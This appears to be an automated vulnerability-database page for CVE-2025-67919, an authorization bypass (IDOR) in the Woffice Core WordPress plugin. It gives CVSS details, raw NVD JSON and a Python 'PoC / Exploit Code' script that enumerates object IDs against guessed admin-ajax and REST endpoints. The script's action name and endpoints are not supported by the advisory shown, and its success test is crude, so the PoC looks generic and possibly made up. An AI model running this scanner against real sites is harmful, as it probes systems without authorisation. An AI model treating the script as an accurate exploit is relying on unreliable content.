Security Vulnerability Report
中文
CVE-2025-67919 CVSS 6.5 MEDIUM

CVE-2025-67919

Published: 2026-01-08 10:15:51
Last Modified: 2026-04-27 18:16:49

Description

Authorization Bypass Through User-Controlled Key vulnerability in WofficeIO Woffice Core woffice-core allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Woffice Core: from n/a through <= 5.4.30.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Woffice Core <= 5.4.30
woffice-core from n/a through 5.4.30

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-67919 PoC - Woffice Core IDOR Vulnerability import requests import sys def check_vulnerability(target_url): """ Check if target is vulnerable to CVE-2025-67919 This PoC demonstrates IDOR vulnerability in Woffice Core """ # Common Woffice AJAX endpoints endpoints = [ '/wp-admin/admin-ajax.php', '/wp-json/woffice/v1/', '/?rest_route=/woffice/v1/' ] # Test with different object IDs test_ids = [1, 2, 3, 100, 1000] for endpoint in endpoints: for obj_id in test_ids: # Try to access protected resources with different IDs params = { 'action': 'woffice_get_object', 'object_id': obj_id } try: response = requests.get( target_url.rstrip('/') + endpoint, params=params, timeout=10, verify=False ) # If response indicates successful unauthorized access if response.status_code == 200: data = response.json() if 'data' in data or 'content' in data: print(f'[+] Potential vulnerability found at {endpoint}') print(f'[+] Object ID: {obj_id}') return True except Exception as e: print(f'[-] Error testing {endpoint}: {e}') return False if __name__ == '__main__': if len(sys.argv) < 2: print('Usage: python cve-2025-67919.py <target_url>') sys.exit(1) target = sys.argv[1] print(f'[*] Scanning {target} for CVE-2025-67919...') if check_vulnerability(target): print('[+] Target appears to be vulnerable') else: print('[-] Target does not appear to be vulnerable')

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67919", "sourceIdentifier": "[email protected]", "published": "2026-01-08T10:15:50.840", "lastModified": "2026-04-27T18:16:48.960", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Authorization Bypass Through User-Controlled Key vulnerability in WofficeIO Woffice Core woffice-core allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Woffice Core: from n/a through <= 5.4.30."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/woffice-core/vulnerability/wordpress-woffice-core-plugin-5-4-30-insecure-direct-object-references-idor-vulnerability?_s_id=cve", "source": "[email protected]"}]}}